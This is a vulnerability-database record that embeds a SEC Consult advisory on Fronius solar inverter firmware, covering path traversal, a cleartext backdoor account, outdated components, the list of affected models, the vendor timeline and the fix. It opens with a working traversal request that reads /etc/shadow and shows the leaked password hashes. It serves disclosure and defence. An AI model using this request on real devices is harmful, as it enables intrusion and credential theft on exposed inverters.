/admincgi-bin/service.fcgi?action=download\u0026filename=../../../../../etc/shadow\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\nAs response, the file is returned without line breaks. In this example the\nline breaks are added for better readability:\n\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n|HTTP/1.1 200 OK\n|Content-Type: application/force-download\n|Content-Disposition: attachment; filename=../../../../../etc/shadow\n|Connection: close\n|Date: Sun, 28 Oct 2018 08:20:27 GMT\n|Server: webserver\n|\n|root:$1$6MNb1Vq3$oU4TaPqQ782Y2ybdWLICh1:0:1:99999:7:::\n|nobody:*:10897:0:99999:7:::\n|messagebus:$1$6JrvtnWp$T.JvjxjbGTCD.jF7.hhb3.:15638:0:99999:7:::\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\nBy retrieving the file \"/etc/issue\" an easter-egg was found:\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n| __ ___ _ _ _ _ __ ___ _ __ __ _\n|\\\\ \\\\ / (_|_|_|_) |_ __ __ _ __ _ __ _ / / | \\\\| | \\\\ \\\\ / /___| |__\n| \\\\ \\\\/\\\\/ /| | | | | | \u0027 \\\\/ _` / _` / _` | / / | |) | |__ \\\\ \\\\/\\\\/ // -_) \u0027_ \\\\\n| \\\\_/ \\\\_/ |_|_|_|_|_|_|_|_\\\\__,_\\\\__,_\\\\__,_| /_/ |___/|____| \\\\_/ \\\\_/\\\\___|_.__/\n|Congratulations to all non Fronius employees which have come so far :)\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\n3) Backdoor Account (CVE-2019-19228)\nThe passwords of the web interface of the affected versions are stored in the file\n\"/tmp/web_users.conf\" in clear text:\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n|admin:\u003cuser-password\u003e\n|service:\u003cuser-password\u003e\n|today:\u003c40-bit hash-value\u003e\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\nThe password for \"today\", which is generated by some algorithm, is suspected\nto be a sha1-hash which includes the system-time. A detailed firmware analysis\ncan reveal the algorithm but has not been performed for this advisory. \n\n\n4) Outdated and Vulnerable Software Components\nBy using the path traversal vulnerability (2) a lot of components are found to\nbe outdated:\n\n* Busybox 1.22.1 (December 23, 2014) multiple CVEs\n* Lighttpd 1.4.33 (September 27, 2013) multiple CVEs\n* Linux kernel 4.1.39 (March 13, 2017) multiple CVEs\n\nThe used SDK is based on the OSELAS toolchain from 2011 and U-Boot from 2012:\n* gcc version 4.6.2 (OSELAS.Toolchain-2011.11.1)\n* U-Boot 2012.07-3\n\n\nVulnerable / tested versions:\n-----------------------------\nThe Fronius Symo 10.0-3-M (1) SWVersion 3.10.3-1 (HM 1.9.2) was tested but more solar\ninverters from Fronius share this firmware. The following list has been provided by\nthe vendor:\n\nSymo Hybrid 3.0-3-M\nSymo Hybrid 4.0-3-M\nSymo Hybrid 5.0-3-M\nDatamanager Box 2.0\nSymo 3.0-3-M *)\nSymo 3.0-3-S *)\nSymo 3.7-3-M *)\nSymo 3.7-3-S *)\nSymo 4.5-3-M *)\nSymo 4.5-3-S *)\nSymo 5.0-3-M *)\nSymo 6.0-3-M *)\nSymo 7.0-3-M *)\nSymo 8.2-3-M *)\nSymo 10.0-3-M *) (tested)\nSymo 10.0-3-M-OS *)\nSymo 12.5-3-M *)\nSymo 15.0-3-M *)\nSymo 17.5-3-M *)\nSymo 20.0-3-M *)\nGalvo 1.5-1 *)\nGalvo 2.0-1 *)\nGalvo 2.5-1 *)\nGalvo 3.0-1 *)\nGalvo 3.1-1 *)\nGalvo 1.5-1 208-240 *)\nGalvo 2.0-1 208-240 *)\nGalvo 2.5-1 208-240 *)\nGalvo 3.1-1 208-240 *)\nPrimo 3.0-1 *)\nPrimo 3.5-1 *)\nPrimo 3.6-1 *)\nPrimo 4.0-1 *)\nPrimo 4.6-1 *)\nPrimo 5.0-1 *)\nPrimo 5.0-1 AUS *)\nPrimo 5.0-1 SC *)\nPrimo 6.0-1 *)\nPrimo 8.2-1 *)\nPrimo 3.8-1 208-240 *)\nPrimo 5.0-1 208-240 *)\nPrimo 6.0-1 208-240 *)\nPrimo 7.6-1 208-240 *)\nPrimo 8.2-1 208-240 *)\nPrimo 10.0-1 208-240 *)\nPrimo 11.4-1 208-240 *)\nPrimo 12.5-1 208-240 *)\nPrimo 15.0-1 208-240 *)\nSymo 10.0-3 208-240 *)\nSymo 10.0-3 480 *)\nSymo 12.0-3 208-240 *)\nSymo 12.5-3 480 *)\nSymo 15.0-3 107 *)\nSymo 15.0-3 480 *)\nSymo 17.5-3 480 *)\nSymo 20.0-3 480 *)\nSymo 22.7-3 480 *)\nSymo 24.0-3 480 *)\nEco 25.0-3-S *)\nEco 27.0-3-S *)\nSymo Advanced 10.0-3 208-240 *)\nSymo Advanced 12.0-3 208-240 *)\nSymo Advanced 15.0-3 480 *)\nSymo Advanced 20.0-3 480 *)\nSymo Advanced 22.7-3 480 *)\nSymo Advanced 24.0-3 480 *)\n*) only with Datamanager card/box\n\n\nVendor contact timeline:\n------------------------\n2018-11-05: Contacting vendor through contact@fronius.com, requesting\n security contact\n2018-11-06: Vendor replies and confirms security issues\n2018-12-03: Meeting with vendor to discuss security issues\n2019-01 - 2019-11: Multiple telcos discussing Fronius\u0027 rollout plan and fixes\n2019-03-18: Release of version 3.12.5 (HM 1.10.5) which fixes the path traversal vulnerability\n2019-07-30: Release of version 3.14.1 (HM 1.12.1) which fixes many of the other reported issues\n2019-08 - 2019-11: Testing \u0026 Fleet update to version 3.14.1 (HM 1.12.1)\n2019-12-03: Coordinated release of security advisory\n\n\nSolution:\n---------\nThe vendor provides a patched firmware via their download portal. Visit\nthe download page and search for \"firmware update\" and choose the\n\"Fronius Solar.update Datamanager V3.14.1-10\" firmware. \n\nThe new version v3.14.1 (HM 1.12.1) which contains most of the security fixes can be\ndownloaded directly as well:\nhttps://www.fronius.com/~/downloads/Solar%20Energy/Firmware/SE_FW_Fronius_Solar.update_Datamanager_EN.zip\n\nSome of the identified vulnerabilities (e.g. issue 1 and parts of 4) cannot be fixed\nin the current solar inverter product/software generation. \n\n\nWorkaround:\n-----------\nRestrict network access to the device as much as possible and disable port forwarding\nfrom the Internet. Fronius Solar.Web access is still possible. \n\n\nAdvisory URL:\n-------------\nhttps://www.sec-consult.com/en/vulnerability-lab/advisories/index.html\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSEC Consult Vulnerability Lab\n\nSEC Consult\nEurope | Asia | North America\n\nAbout SEC Consult Vulnerability Lab\nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It\nensures the continued knowledge gain of SEC Consult in the field of network\nand application security to stay ahead of the attacker. The SEC Consult\nVulnerability Lab supports high-quality penetration testing and the evaluation\nof new offensive and defensive technologies for our customers. Hence our\ncustomers obtain the most current information about vulnerabilities and valid\nrecommendation about the risk profile of new technologies. \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nInterested to work with the experts of SEC Consult?\nSend us your application https://www.sec-consult.com/en/career/index.html\n\nInterested in improving your cyber security with the experts of SEC Consult?\nContact our local offices https://www.sec-consult.com/en/contact/index.html\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nMail: research at sec-consult dot com\nWeb: https://www.sec-consult.com\nBlog: http://blog.sec-consult.com\nTwitter: https://twitter.com/sec_consult\n\nEOF T. Weber / @2019\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-19229"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013067"
},
{
"db": "CNVD",
"id": "CNVD-2019-45163"
},
{
"db": "PACKETSTORM",
"id": "155562"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "PACKETSTORM",
"id": "155562",
"trust": 3.1
},
{
"db": "NVD",
"id": "CVE-2019-19229",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013067",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-45163",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201912-185",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-45163"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013067"
},
{
"db": "PACKETSTORM",
"id": "155562"
},
{
"db": "CNNVD",
"id": "CNNVD-201912-185"
},
{
"db": "NVD",
"id": "CVE-2019-19229"
}
]
},
"id": "VAR-201912-1533",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-45163"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-45163"
}
]
},
"last_update_date": "2024-11-23T22:41:16.744000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.fronius.com/en"
},
{
"title": "Patch for Fronius Solar Inverter Series path traversal vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/194039"
},
{
"title": "Fronius Solar Inverter Repair measures for path traversal vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=105250"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-45163"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013067"
},
{
"db": "CNNVD",
"id": "CNNVD-201912-185"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-013067"
},
{
"db": "NVD",
"id": "CVE-2019-19229"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "http://packetstormsecurity.com/files/155562/fronius-solar-inverter-series-insecure-communication-path-traversal.html"
},
{
"trust": 2.2,
"url": "https://seclists.org/bugtraq/2019/dec/5"
},
{
"trust": 1.6,
"url": "https://sec-consult.com/en/blog/advisories/multiple-vulnerabilites-in-fronius-solar-inverter-series-cve-2019-19229-cve-2019-19228/"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19229"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-19229"
},
{
"trust": 0.1,
"url": "https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html"
},
{
"trust": 0.1,
"url": "http://\u003cip-address\u003e/admincgi-bin/service.fcgi"
},
{
"trust": 0.1,
"url": "https://www.fronius.com/~/downloads/solar%20energy/firmware/se_fw_fronius_solar.update_datamanager_en.zip"
},
{
"trust": 0.1,
"url": "https://www.sec-consult.com"
},
{
"trust": 0.1,
"url": "https://www.fronius.com"
},
{
"trust": 0.1,
"url": "http://www.fronius.com/en/about-fronius/company-values"
},
{
"trust": 0.1,
"url": "https://twitter.com/sec_consult"
},
{
"trust": 0.1,
"url": "https://www.sec-consult.com/en/contact/index.html"
},
{
"trust": 0.1,
"url": "http://blog.sec-consult.com"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19228"
},
{
"trust": 0.1,
"url": "https://www.sec-consult.com/en/career/index.html"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-45163"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013067"
},
{
"db": "PACKETSTORM",
"id": "155562"
},
{
"db": "CNNVD",
"id": "CNNVD-201912-185"
},
{
"db": "NVD",
"id": "CVE-2019-19229"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-45163"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013067"
},
{
"db": "PACKETSTORM",
"id": "155562"
},
{
"db": "CNNVD",
"id": "CNNVD-201912-185"
},
{
"db": "NVD",
"id": "CVE-2019-19229"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-12-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-45163"
},
{
"date": "2019-12-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-013067"
},
{
"date": "2019-12-04T23:31:06",
"db": "PACKETSTORM",
"id": "155562"
},
{
"date": "2019-12-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201912-185"
},
{
"date": "2019-12-04T19:15:11.893000",
"db": "NVD",
"id": "CVE-2019-19229"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-12-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-45163"
},
{
"date": "2019-12-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-013067"
},
{
"date": "2019-12-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201912-185"
},
{
"date": "2024-11-21T04:34:22.627000",
"db": "NVD",
"id": "CVE-2019-19229"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201912-185"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Fronius Solar Inverter Path traversal vulnerability in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-013067"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201912-185"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…